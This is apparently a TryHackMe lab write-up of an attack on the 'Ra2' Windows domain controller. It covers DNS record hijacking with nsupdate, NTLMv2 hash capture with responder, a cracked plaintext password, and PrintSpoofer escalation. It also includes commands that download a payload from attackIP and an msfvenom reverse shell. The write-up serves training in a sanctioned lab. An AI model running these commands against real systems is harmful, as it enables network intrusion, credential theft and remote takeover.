Ra2 (THM)

TryHackMeRa2 Write-Up

topics: DNS Poisoning (modify DNS records with SSL certificates), web application attacks, cracking passwords, Windows Privilege Escalation, printspoofer

  1. Enumeration

  2. Local Privilege Escalation

  3. System Privilege Escalation

new tools: responder, dig, pfx2john, nsupdate

Enumeration

initial autorecon and nmap scan .././autonmap.sh $ip Full

Inspecting the scans, there are numerous ports open on this machine. However, because of certain open ports like DNS, LDAP/S, Kerberos, RDP etc we can surmise that this is a domain controller for an Active Directory environment. Additionally, we can see from the DNS enumeration alternative DC names.

Lets add these names to the hosts file and try to dig some additional domains from this machine.

DNS

As this machine seems to be a domain controller, it would make sense to enumerate DNS first to see what information we can obtain.

dig windcorp.thm any @victimIP

We can see the additional domain name hostmaster.thm and the domain that first answers a DNS query. We can also see a flag and a text file left for us to read which provides a hint to the initial foothold.

Permitting unsecured dynamic DNS updates gives ANY computer (not just on the domain) the ability to modify or create DNS records. Meaning we can effectively change/add any subdomain name (including malicious ones) and even impersonate the server for user authentication and capture hashes.

HTTPS

We have about three unique subdomains on this domain controller, we can run a dirsearch scan on each of them

python3 dirsearch.py -u https://$ip -e php,html,txt

The subdomain selfservice.dev.windcorp.thm returned an interesting /backup directory. Not pictured we can also see a /powershell directory on fire.windcorp but we need credentials.

Navigating to /backups on selfservice.dev.windcorp.thm

We have a cert.pfx file and an empty config file. Windows servers use .pfx files that contain public and private keys for their HTTPS certificates.

Local Privilege Escalation

With the knowledge of permission to update DNS records and obtaining the cert.pfx file, we can now impersonate the HTTPS server on the domain controller. We can add the attacking machine to a list of trusted subdomains and intercept user hashes when communicating with the controller.

Impersonating the Server

We can extract the password for the certificate with pfx2john and john

We need to extract the contents of the pfx file to impersonate for our own key and certificate with openssl

openssl pkcs12 -in cert.pfx -nocerts -out key.pem -nodes : use PKCS12 for key encryption, do not ouput a certificate and do not encrypt the private keys
openssl pkcs12 -in cert.pfx -out crt.pem -clcerts -nodes : same commands and output only client certificate (not CA)

The .pem files are now ready to impersonate the HTTPS server. Next we must:

  • update the DNS record of the domain controller to point to the attacking machine with nsupdate

  • verify answer section with dig

  • copy the cert files to the responder certs folder

  • listen with responder -I tun0

Below are the nsupdate commands to add our attacking machine as the new selfservice.windcorp.thm subdomain on the domain controller.

root@kal:~/ra2# nsupdate
> server victimIP
> update delete selfservice.windcorp.thm
> send
> update add selfservice.windcorp.thm <port> <attackIP>
> send
> quit

responder has captured an HTTP event and has logged the NTLMv2 hash of the user edwardle. We can crack this with john

The credentials edwardle:!Angelus25! should be valid to use with the powershell aspx console discovered with HTTPS enumeration. I attempted evil-winrm but it was not successful, we can assume it's disabled for now.

Domain Admin Privilege Escalation

Starting with whoami /priv we can see we have the very critical SeImpersonatePrivilege that leverages PrintSpoofer for SYSTEM escalation

We need to:

  • make a c:\temp directory

  • craft a reverse shell with msfvenom and listen for it

  • download printspoofer

  • transfer the files to the victim machine and run the program

(New-Object System.Net.WebClient).DownloadFile("http://attackIP/PrintSpoofer.exe", "C:\Temp\print.exe") : download PrintSpoofer to victim
msfvenom -p windows/shell_reverse_tcp lhost=attackIP lport=53 -f exe -o shell.exe : create reverse shell
(New-Object System.Net.WebClient).DownloadFile("http://attackIP/shell.exe", "C:\Temp\shell.exe") : download shell to victim
rlwrap nc -nlvp 53
.\print.exe -c shell.exe

Last updated